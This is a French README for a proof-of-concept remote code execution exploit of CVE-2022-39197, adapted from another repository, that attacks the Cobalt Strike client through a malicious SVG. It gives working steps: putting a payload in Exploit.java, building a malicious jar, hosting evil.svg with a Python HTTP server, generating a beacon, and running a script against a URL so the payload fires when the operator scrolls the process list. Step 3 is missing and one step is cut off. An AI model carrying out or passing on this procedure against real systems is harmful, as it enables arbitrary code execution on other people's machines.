
POC RCE CVE-2022-39197
Ce projet a été modifié à partir du projet @its-arun https://github.com/its-arun/CVE-2022-39197
Lorsque j'ai testé le script, j'ai constaté que le script frida ne pouvait pas interroger les données dans l'ordre normal. La méthode consiste à modifier le script frida pour changer le nom du processus.
Merci au Maître @Kai5174 pour sa contribution à la méthode d'utilisation.
1、Modifiez la commande exécutée avec votre payload dans EvilJar/src/main/java/Exploit.java, actuellement il ne peut que lancer la calculatrice.
2、Construisez le jar avec mvn clean compile assembly:single
4、Déplacez EvilJar-1.0-jar-with-dependencies.jar de EvilJar/target/ vers le dossier serve/
5、Modifiez serve\evil.svg et remplacez
[attacker]6、Servez avec python3 -m http.server 8080
7、Générez beacon.exe avec une version de C2 inférieure ou égale à 4.7
8、Vous devez exécuter le script py sur Windows pour vous connecter, et prendre des contre-mesures lorsque le client accède à la liste des processus et voit le processus beacon.exe.
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
Le Payload sera déclenché dès que l'utilisateur fera défiler la liste des processus.
Windows

Mac

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Il y a une excellente analyse approfondie de cette vulnérabilité https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html